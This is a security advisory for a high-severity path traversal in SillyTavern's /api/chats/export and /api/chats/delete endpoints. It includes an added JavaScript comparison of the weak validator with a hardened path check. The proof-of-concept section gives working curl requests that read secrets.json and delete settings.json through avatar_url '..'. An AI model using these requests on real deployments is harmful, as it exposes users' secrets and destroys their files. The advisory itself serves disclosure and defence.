HIGH 8.3 npm

SillyTavern: Path Traversal in `/api/chats/export` and `/api/chats/delete` allows arbitrary file read/delete within user data root

GHSA-vprr-q85p-79mf · CVE-2026-34524


Description

Summary

A Path Traversal vulnerability in chat endpoints allows an authenticated attacker to read and delete arbitrary files under their user data root (for example `secrets.json` and `settings.json`) by supplying `avatar_url=".."`.

Details

The input validator used by `avatar_url` blocks only `/` and NUL bytes, but does not block traversal segments like `..`.

Evidence:

Because `avatar_url=".."` is accepted, `path.join(<user>/chats, "..")` resolves to `<user>/`, enabling direct access to files outside the chats directory.
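An added example, not SillyTavern's code or its actual fix: a constructed stand-in for the validator described above, next to a containment check that resolves the final path and rejects anything outside the base directory. The directory layout and the names `weakValidate`, `resolveInside` and `demo` are assumptions made for illustration.

```javascript
const path = require('node:path');

// Constructed layout (assumption): per-user data root with a chats/ subdirectory.
const userRoot = path.resolve('/srv/st-data/default-user');
const chatsDir = path.join(userRoot, 'chats');

// Stand-in for the weak check described above: only "/" and NUL are rejected,
// so the single segment ".." is accepted.
function weakValidate(name) {
    return typeof name === 'string' && !name.includes('/') && !name.includes('\0');
}

// Hardened: resolve the final path first, then require it to sit strictly
// below baseDir. Returns the absolute path, or null when it escapes.
function resolveInside(baseDir, ...segments) {
    const bad = (s) => typeof s !== 'string' || s.length === 0 || s.includes('\0');
    if (segments.length === 0 || segments.some(bad)) return null;
    const base = path.resolve(baseDir);
    const target = path.resolve(base, ...segments);
    const rel = path.relative(base, target);
    const escapes = rel === '' || rel === '..' ||
        rel.startsWith('..' + path.sep) || path.isAbsolute(rel);
    return escapes ? null : target;
}

// Runs the advisory's request values through both approaches.
function demo() {
    const avatarUrl = '..';
    const file = 'secrets.json';
    return {
        weakAccepts: weakValidate(avatarUrl),                  // true
        weakPath: path.join(chatsDir, avatarUrl, file),        // lands in userRoot
        hardened: resolveInside(chatsDir, avatarUrl, file),    // null
        legit: resolveInside(chatsDir, 'Seraphina', 'chat-1.jsonl'),
    };
}

console.log(demo());
```

Checking the resolved path rather than the raw string also covers segments that only escape in combination, and still allows file names that merely begin with two dots.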

PoC

Prerequisites:

  • Valid authenticated session cookie (cookie.txt)
  • Valid CSRF token ($TOKEN)

Read sensitive file (secrets.json):

curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","is_group":false,"file":"secrets.json","format":"jsonl","exportfilename":"x"}' \
  http://TARGET:8000/api/chats/export

Delete sensitive file (settings.json):

curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","chatfile":"settings.json"}' \
  http://TARGET:8000/api/chats/delete

Impact

  • Confidentiality: exposed per-user secrets and config data.
  • Integrity/Availability: attacker can delete critical per-user files and break account operation.
  • Risk is significant in multi-user or remotely reachable deployments.

Resolution

The issue was addressed in version 1.17.0.
